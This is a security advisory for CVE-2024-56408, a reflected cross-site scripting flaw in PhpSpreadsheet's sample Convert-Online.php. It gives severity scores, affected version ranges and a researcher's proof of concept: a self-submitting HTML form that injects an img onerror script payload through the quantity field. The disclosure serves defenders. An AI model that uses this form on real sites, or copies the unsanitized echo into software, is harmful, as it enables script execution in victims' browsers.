GHSA-X88G-H956-M5XG

Vulnerability from github – Published: 2025-01-03 16:05 – Updated: 2025-05-20 18:30
VLAI?
Summary
PhpSpreadsheet allows unauthorized Reflected XSS in `Convert-Online.php` file
Details

Unauthorized Reflected XSS in Convert-Online.php file

Product: Phpspreadsheet Version: version 3.6.0 CWE-ID: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') CVSS vector v.3.1: 8.2 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N) CVSS vector v.4.0: 8.3 (AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L) Description: using the /vendor/phpoffice/phpspreadsheet/samples/Engineering/Convert-Online.php script, an attacker can perform a XSS-type attack Impact: executing arbitrary JavaScript code in the browser Vulnerable component: the /vendor/phpoffice/phpspreadsheet/samples/Engineering/Convert-Online.php file Exploitation conditions: an unauthorized user Mitigation: sanitization of the quantity variable Researcher: Aleksey Solovev (Positive Technologies)

Research

The researcher discovered zero-day vulnerability Unauthorized Reflected Cross-Site Scripting (XSS) (in Convert-Online.php file) in Phpspreadsheet.

There is no sanitization in the /vendor/phpoffice/phpspreadsheet/samples/Engineering/Convert-Online.php file, which leads to the possibility of a XSS attack.

fig4

Figure 4. The message with the quantity parameter is displayed without sanitization

The following figure shows a POST HTTP-request and a response to the server with the variable quantity, which is displayed in the response from the server without sanitization.

fig5

Figure 5. In the server's response , the quantity variable is displayed without sanitization

An attacker can prepare a special HTML form that will be automatically sent to the vulnerable scenario.

Listing 3. HTML form that demonstrates the exploitation of the XSS vulnerability

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://192.***.***.***/vendor/phpoffice/phpspreadsheet/samples/Engineering/Convert-Online.php" method="POST">
      <input type="hidden" name="category" value="Weight&#32;and&#32;Mass" />
      <input type="hidden" name="quantity" value="1&#46;0&lt;img&#32;src&#61;1&#32;onerror&#61;alert&#40;&#41;&gt;" />
      <input type="hidden" name="fromUnit" value="g" />
      <input type="hidden" name="toUnit" value="g" />
      <input type="hidden" name="submitx" value="Convert" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

After the user visits the attacker's resource, the form will be sent to the vulnerable scenario, which will lead to the execution of arbitrary code in the client's browser.

fig6

Figure 6. Executing arbitrary JavaScript code

Credit

This vulnerability was discovered by Aleksey Solovev (Positive Technologies)

Severity ?
7.1 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N
8.3 (High)
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpspreadsheet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0"
            },
            {
              "fixed": "3.7.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.29.6"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpspreadsheet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.29.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.1.5"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpspreadsheet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0"
            },
            {
              "fixed": "2.1.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.3.4"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpspreadsheet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.2.0"
            },
            {
              "fixed": "2.3.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpexcel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.8.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-56408"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-01-03T16:05:26Z",
    "nvd_published_at": "2025-01-03T16:15:26Z",
    "severity": "HIGH"
  },
  "details": "# Unauthorized Reflected XSS in `Convert-Online.php` file\n**Product**: Phpspreadsheet\n**Version**: version 3.6.0\n**CWE-ID**: CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)\n**CVSS vector v.3.1**: 8.2 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N)\n**CVSS vector v.4.0**: 8.3 (AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L)\n**Description**: using the `/vendor/phpoffice/phpspreadsheet/samples/Engineering/Convert-Online.php` script, an attacker can perform a XSS-type attack \n**Impact**: executing arbitrary JavaScript code in the browser\n**Vulnerable component**: the `/vendor/phpoffice/phpspreadsheet/samples/Engineering/Convert-Online.php` file\n**Exploitation conditions**: an unauthorized user\n**Mitigation**: sanitization of the quantity variable\n**Researcher**: Aleksey Solovev (Positive Technologies)\n\n# Research\n\nThe researcher discovered zero-day vulnerability Unauthorized Reflected Cross-Site Scripting (XSS) (in `Convert-Online.php` file) in Phpspreadsheet.\n\nThere is no sanitization in the `/vendor/phpoffice/phpspreadsheet/samples/Engineering/Convert-Online.php` file, which leads to the possibility of a XSS attack.\n\n![fig4](https://github.com/user-attachments/assets/71a6ab8b-db65-4e7e-bb36-39f0bd0f7077)\n\n*Figure 4. The message with the quantity parameter is displayed without sanitization*\n\n\nThe following figure shows a POST HTTP-request and a response to the server with the variable quantity, which is displayed in the response from the server without sanitization.\n\n\u003cimg width=\"460\" alt=\"fig5\" src=\"https://github.com/user-attachments/assets/022323c9-ca1e-44ea-9380-37ed7848e971\" /\u003e\n\n*Figure 5. In the server\u0027s response , the quantity variable is displayed without sanitization*\n\nAn attacker can prepare a special HTML form that will be automatically sent to the vulnerable scenario.\n\n*Listing 3. HTML form that demonstrates the exploitation of the XSS vulnerability*\n\n```\n\u003chtml\u003e\n  \u003c!-- CSRF PoC - generated by Burp Suite Professional --\u003e\n  \u003cbody\u003e\n    \u003cform action=\"https://192.***.***.***/vendor/phpoffice/phpspreadsheet/samples/Engineering/Convert-Online.php\" method=\"POST\"\u003e\n      \u003cinput type=\"hidden\" name=\"category\" value=\"Weight\u0026#32;and\u0026#32;Mass\" /\u003e\n      \u003cinput type=\"hidden\" name=\"quantity\" value=\"1\u0026#46;0\u0026lt;img\u0026#32;src\u0026#61;1\u0026#32;onerror\u0026#61;alert\u0026#40;\u0026#41;\u0026gt;\" /\u003e\n      \u003cinput type=\"hidden\" name=\"fromUnit\" value=\"g\" /\u003e\n      \u003cinput type=\"hidden\" name=\"toUnit\" value=\"g\" /\u003e\n      \u003cinput type=\"hidden\" name=\"submitx\" value=\"Convert\" /\u003e\n      \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n    \u003c/form\u003e\n    \u003cscript\u003e\n      history.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027);\n      document.forms[0].submit();\n    \u003c/script\u003e\n  \u003c/body\u003e\n\u003c/html\u003e\n```\n\nAfter the user visits the attacker\u0027s resource, the form will be sent to the vulnerable scenario, which will lead to the execution of arbitrary code in the client\u0027s browser.\n \n\u003cimg width=\"389\" alt=\"fig6\" src=\"https://github.com/user-attachments/assets/e52b68c6-5a98-4db2-85ec-5bf37e4cb625\" /\u003e\n\n*Figure 6. Executing arbitrary JavaScript code*\n\n\n# Credit\nThis vulnerability was discovered by **Aleksey Solovev (Positive Technologies)**",
  "id": "GHSA-x88g-h956-m5xg",
  "modified": "2025-05-20T18:30:35Z",
  "published": "2025-01-03T16:05:26Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-x88g-h956-m5xg"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-56408"
    },
    {
      "type": "WEB",
      "url": "https://github.com/PHPOffice/PhpSpreadsheet/commit/700a80346be269af668914172bc6f4521982d0b4"
    },
    {
      "type": "WEB",
      "url": "https://github.com/PHPOffice/PhpSpreadsheet/commit/9b9a55c7154daa7cd4095f618933c240508ba3c1"
    },
    {
      "type": "WEB",
      "url": "https://github.com/PHPOffice/PhpSpreadsheet/commit/a50ebfe118b3ae0ddaea1c48ac19dc38692f4abc"
    },
    {
      "type": "WEB",
      "url": "https://github.com/PHPOffice/PhpSpreadsheet/commit/b8fac55aa5cb7a3d514c7308378bb37bb711b25e"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/PHPOffice/PhpSpreadsheet"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L",
      "type": "CVSS_V4"
    }
  ],
  "summary": "PhpSpreadsheet allows unauthorized Reflected XSS in `Convert-Online.php` file"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.